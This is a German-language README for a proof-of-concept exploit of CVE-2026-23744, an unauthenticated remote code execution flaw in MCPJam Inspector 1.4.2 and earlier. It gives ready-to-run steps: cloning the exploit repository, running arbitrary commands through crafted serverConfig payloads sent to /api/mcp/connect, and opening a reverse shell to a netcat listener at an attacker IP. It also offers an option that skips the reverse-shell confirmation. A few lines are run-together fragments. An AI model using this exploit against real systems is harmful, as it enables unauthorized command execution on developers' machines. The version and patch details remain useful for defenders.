
Proof-of-Concept für nicht authentifizierte Remote-Codeausführung für CVE-2026-23744, der auf MCPJam Inspector abzielt. Generiert maßgeschneiderte MCP-serverConfig-Payloads, um den Endpunkt /api/mcp/connect auszunutzen, mit Unterstützung für Reverse-Shell und Dry-Run-Debugging.
PoC für die nicht authentifizierte Remote-Codeausführung von CVE-2026-23744. MCPJam Inspector 1.4.2 und frühere Versionen legen über /api/mcp/connect Funktionen offen, mit denen sich ohne Authentifizierung ein vom Angreifer kontrollierter MCP-Server-Befehl starten lässt.
Nur für autorisierte Tests und Forschungszwecke. Nicht gegen Systeme verwenden, die Ihnen nicht gehören oder für die Sie keine ausdrückliche Genehmigung zum Testen haben.
HTTP POST -> /api/mcp/connect -> serverConfig command -> process launch -> command execution
serverConfig-Payload./api/mcp/connect.bash -c.


git clone https://github.com/ozcanpng/CVE-2026-23744.git
cd CVE-2026-23744
pip install -r requirements.txt
python3 CVE-2026-23744.py \
--url http://127.0.0.1:3000 \
--cmd 'id'
Starten Sie zuerst einen Listener:
rlwrap nc -lvnp 4444
Führen Sie dann Folgendes aus:
python3 CVE-2026-23744.py \
--url http://127.0.0.1:3000 \
--reverse-shell \
--lhost 10.10.16.53 \
--lport 4444
Nützliche Optionen:
--cmd COMMAND Command to execute (default: id)
--server-id VALUE serverId value in the crafted MCP config (default: pwn)
--dry-run Build payload flow without sending the HTTP request
--debug Print endpoint and JSON payload
--verify-tls Verify HTTPS certificates
--timeout SECONDS HTTP timeout in seconds (default: 8)
--yes Skip reverse-shell confirmation prompt
| Produkt | Betroffene Version | Erforderlicher Zugriff | Auswirkung |
|---|---|---|---|
| MCPJam Inspector | <= 1.4.2 | Keiner | Remote-Befehlsausführung als der Prozessbenutzer von MCPJam Inspector |
Das Problem ist besonders exponiert, wenn MCPJam Inspector auf 0.0.0.0 lauscht, wodurch entfernte Hosts den Entwicklungsdienst erreichen können.
/api/mcp/connect.serverConfig.command und serverConfig.args übergeben.--cmd für eine sichere Validierung, bevor Sie eine Reverse-Shell versuchen.--dry-run --debug, um die generierte Anfrage zu prüfen, ohne ein Ziel zu kontaktieren.1.4.3 enthält laut NVD den Upstream-Patch.ozcanpng — github.com/ozcanpng — ozcanpng.dev